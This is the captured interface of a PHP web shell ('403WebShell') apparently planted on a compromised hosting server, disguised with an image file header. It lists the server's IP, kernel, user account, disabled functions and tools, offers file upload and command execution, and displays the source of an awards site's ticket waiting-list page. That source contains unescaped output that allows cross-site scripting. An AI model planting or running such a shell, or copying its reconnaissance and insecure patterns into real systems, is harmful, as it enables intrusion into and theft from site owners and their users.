����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 3.15.195.108
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/maso-awards.live/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/maso-awards.live/waiting-list.php
<?php include 'php/connect.php'; ?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">

    <title>MASO-AWARDS ~ WAITING LIST</title>
    <meta content="Youth Empowerment Through Arts" name="description">
    <meta content="" name="keywords">

    <!-- Google Fonts -->
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,700,700i|Raleway:300,400,500,700,800" rel="stylesheet">

    <!-- Vendor CSS Files -->
    <link href="assets/vendor/aos/aos.css" rel="stylesheet">
    <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
    <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
    <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
    <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">
    <link href="./assets/img/maso.png" rel="icon">

    <!-- Template Main CSS File -->
    <link href="assets/css/style.css" rel="stylesheet">

    <!-- Sweet Alert -->
    <script src="./js/sweetalert.min.js"></script>

    <!--og codes-->
    <meta property="og:url" content="https://maso-awards.com/index.php" />
    <meta property="og:type" content="website" />
    <meta property="og:title" content="<?php echo "MASO AWARDS"; ?>" />
    <meta property="og:image" content="https://maso-awards.live/assets/img/maso-og.jpg" />
    <meta property="og:description" content="Book Ticket" />
    <meta property="fb:app_id" content="197362031139140" />
</head>

<body>

    <?php include './header.php'; ?>

    <!-- ======= Ticket Section ======= -->
    <section id="hero-1">
        <div class="hero-container" data-aos="zoom-in" data-aos-delay="100">
            <h1 class="mb-5 pb-0">WAITING LIST</h1>
        </div>
    </section><!-- End Ticket Section -->

    <main id="main">

        <!-- ======= Contact Section ======= -->
        <section id="contact" class="section-bg">

            <div class="container" data-aos="fade-up">

                <?php
                include './php/connect.php';
                include './php/waiting-list-form.php';
                ?>
                <div class="form">
                    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" class="php-email-form">
                        <div class="form-group mt-3 mb-4">
                            <input type="text" class="form-control" name="name" id="subject" placeholder="Full Name" value="<?php echo isset($_SESSION['name']) ? $_SESSION['name'] : ''; ?>" required>
                        </div>
                        <div class="form-group mt-3 mb-4">
                            <input type="text" class="form-control" name="mobile" id="subject" placeholder="Mobile Number" value="<?php echo isset($_SESSION['mobile']) ? $_SESSION['mobile'] : ''; ?>" required>
                        </div>
                        <div class="form-group mt-3 mb-4">
                            <input type="email" class="form-control" name="email" id="subject" placeholder="Email Address" value="<?php echo isset($_SESSION['email']) ? $_SESSION['email'] : ''; ?>" required>
                        </div>
                        <div class="form-group mt-3 mb-4">
                            <select name="ticket_type" class="form-control" required>
                                <option disabled selected value="">Ticket Type</option>
                                <option value="standard">STANDARD (K15,000)</option>
                                <option value="vip">VIP (K35,000)</option>
                            </select>
                        </div>
                        <div class="text-center"><button type="submit" name="submit">Join The Waitlist</button></div>
                    </form>
                </div>

            </div>
        </section><!-- End Contact Section -->

    </main><!-- End #main -->

    <!-- ======= Footer ======= -->
    <footer id="footer">
        <div class="footer-top">
            <div class="container">
                <div class="row">
                    <div class="col-lg-4 col-md-6 footer-links">
                        <h4>Useful Links</h4>
                        <ul>
                            <li><i class="bi bi-chevron-right"></i> <a href="#about">About Us</a></li>
                            <li><i class="bi bi-chevron-right"></i> <a href="#hotels">News</a></li>
                            <li><i class="bi bi-chevron-right"></i> <a href="buy-ticket">Buy Ticket</a></li>
                            <li><i class="bi bi-chevron-right"></i> <a href="#vote">Vote</a></li>
                        </ul>
                    </div>

                    <div class="col-lg-4 col-md-6 footer-info">
                        <img src="assets/img/maso.png" alt="TheEvenet">
                    </div>

                    <div class="col-lg-4 col-md-6 footer-contact">
                        <h4>Contact Us</h4>
                        <p>
                            Chichiri<br>
                            Blantyre<br>
                            Malawi <br>
                            <strong>Phone:</strong> +265 884 41 21 72 / +265 994 61 91 94<br>
                            <strong>Email:</strong> info@maso-awards.live<br>
                        </p>

                        <div class="social-links">
                            <a href="#" class="twitter"><i class="bi bi-twitter"></i></a>
                            <a href="#" class="facebook"><i class="bi bi-facebook"></i></a>
                            <a href="#" class="instagram"><i class="bi bi-instagram"></i></a>
                            <a href="#" class="google-plus"><i class="bi bi-instagram"></i></a>
                            <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="container">
            <div class="copyright">
                &copy; Copyright <strong>MASO Awards</strong>. All Rights Reserved
            </div>
        </div>
    </footer><!-- End  Footer -->

    <a href="#" class="back-to-top d-flex align-items-center justify-content-center"><i class="bi bi-arrow-up-short"></i></a>

    <!-- Vendor JS Files -->
    <script src="assets/vendor/aos/aos.js"></script>
    <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
    <script src="assets/vendor/glightbox/js/glightbox.min.js"></script>
    <script src="assets/vendor/swiper/swiper-bundle.min.js"></script>

    <!-- Template Main JS File -->
    <script src="assets/js/main.js"></script>

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit